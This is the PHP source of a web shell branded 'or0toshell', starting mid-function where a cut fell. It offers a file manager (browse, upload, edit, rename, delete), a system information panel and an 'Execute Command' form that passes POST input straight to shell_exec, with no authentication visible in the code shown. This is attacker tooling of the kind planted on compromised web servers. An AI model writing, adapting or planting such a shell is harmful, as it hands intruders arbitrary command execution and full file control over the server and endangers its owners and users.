= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { return $bytes . ' bytes'; } elseif ($bytes == 1) { return $bytes . ' byte'; } return '0 bytes'; } function fileExtension($file) { return pathinfo($file, PATHINFO_EXTENSION); } function fileIcon($file) { $ext = strtolower(fileExtension($file)); $imgExts = ["apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"]; $audioExts = ["wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"]; if ($file === "error_log") { return ''; } elseif ($file === ".htaccess") { return ''; } if (in_array($ext, ["html", "htm"])) { return ''; } elseif (in_array($ext, ["php", "phtml"])) { return ''; } elseif (in_array($ext, $imgExts)) { return ''; } elseif ($ext === "css") { return ''; } elseif ($ext === "txt") { return ''; } elseif (in_array($ext, $audioExts)) { return ''; } elseif ($ext === "py") { return ''; } elseif ($ext === "js") { return ''; } return ''; } function encodePath($path) { return urlencode(base64_encode($path)); } function decodePath($encoded) { return base64_decode(urldecode($encoded)); } function generateBreadcrumb($path) { $path = str_replace('\\', '/', $path); $parts = explode('/', $path); $breadcrumb = 'Root'; $current = ''; foreach ($parts as $part) { if (empty($part)) continue; $current .= DIRECTORY_SEPARATOR . $part; $breadcrumb .= ' / ' . htmlspecialchars($part) . ''; } return $breadcrumb; } $currentPath = $rootPath; if (isset($_GET['p'])) { $decoded = decodePath($_GET['p']); if (is_dir($decoded)) { $currentPath = realpath($decoded); } else { $_SESSION['message'] = "Invalid directory."; header("Location: ?p=" . encodePath($rootPath)); exit; } } elseif (isset($_GET['q'])) { $decoded = decodePath($_GET['q']); if (is_dir($decoded)) { $currentPath = realpath($decoded); } else { header("Location: ?p=" . encodePath($rootPath)); exit; } } define("CURRENT_PATH", $currentPath); if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['rename']) && isset($_GET['r'])) { $oldItem = CURRENT_PATH . DIRECTORY_SEPARATOR . basename($_GET['r']); $newName = basename($_POST['name']); $newItem = CURRENT_PATH . DIRECTORY_SEPARATOR . $newName; if (rename($oldItem, $newItem)) { $_SESSION['message'] = "Renamed successfully."; } else { $_SESSION['message'] = "Rename failed."; } header("Location: ?p=" . encodePath(CURRENT_PATH)); exit; } if (isset($_POST['edit']) && isset($_GET['e'])) { $filePath = CURRENT_PATH . DIRECTORY_SEPARATOR . basename($_GET['e']); if (file_put_contents($filePath, $_POST['data']) !== false) { $_SESSION['message'] = "File saved successfully."; } else { $_SESSION['message'] = "Error saving file."; } header("Location: ?p=" . encodePath(CURRENT_PATH)); exit; } if (isset($_POST['upload'])) { if (isset($_FILES['fileToUpload'])) { $targetPath = CURRENT_PATH . DIRECTORY_SEPARATOR . basename($_FILES['fileToUpload']['name']); if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $targetPath)) { $_SESSION['message'] = "File uploaded successfully."; } else { $_SESSION['message'] = "Upload failed."; } } header("Location: ?p=" . encodePath(CURRENT_PATH)); exit; } if (isset($_POST['execute_cmd'])) { $cmd = $_POST['cmd']; $output = shell_exec($cmd); $_SESSION['cmd_output'] = $output; header("Location: ?p=" . encodePath(CURRENT_PATH)); exit; } } if (isset($_GET['d'])) { $itemName = basename($_GET['d']); $itemPath = CURRENT_PATH . DIRECTORY_SEPARATOR . $itemName; if (is_file($itemPath)) { if (unlink($itemPath)) { $_SESSION['message'] = "File deleted."; } else { $_SESSION['message'] = "Error deleting file."; } } elseif (is_dir($itemPath)) { if (rmdir($itemPath)) { $_SESSION['message'] = "Directory deleted."; } else { $_SESSION['message'] = "Error deleting directory (ensure it is empty)."; } } header("Location: ?p=" . encodePath(CURRENT_PATH)); exit; } $folders = []; $files = []; if (is_readable(CURRENT_PATH)) { $items = scandir(CURRENT_PATH); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $fullPath = CURRENT_PATH . DIRECTORY_SEPARATOR . $item; if (is_dir($fullPath)) { $folders[] = $item; } elseif (is_file($fullPath)) { $files[] = $item; } } } $system_info = [ 'Operating System' => php_uname(), 'PHP Version' => phpversion(), 'Server Software' => $_SERVER['SERVER_SOFTWARE'] ?? 'N/A', 'Document Root' => $_SERVER['DOCUMENT_ROOT'] ?? 'N/A', 'Current Directory'=> CURRENT_PATH, 'Free Disk Space' => formatSizeUnits(disk_free_space(CURRENT_PATH)), 'Total Disk Space' => formatSizeUnits(disk_total_space(CURRENT_PATH)) ]; $message = isset($_SESSION['message']) ? $_SESSION['message'] : ''; $cmd_output = isset($_SESSION['cmd_output']) ? $_SESSION['cmd_output'] : ''; unset($_SESSION['message'], $_SESSION['cmd_output']); ?> or0toshell
System Information
$value): ?>
Execute Command
Output:
Upload File
Rename:
Editing File:
Directory:
Name Size Modified Perms Actions
No files or folders found.
or0toshell - Developed by Ali Essam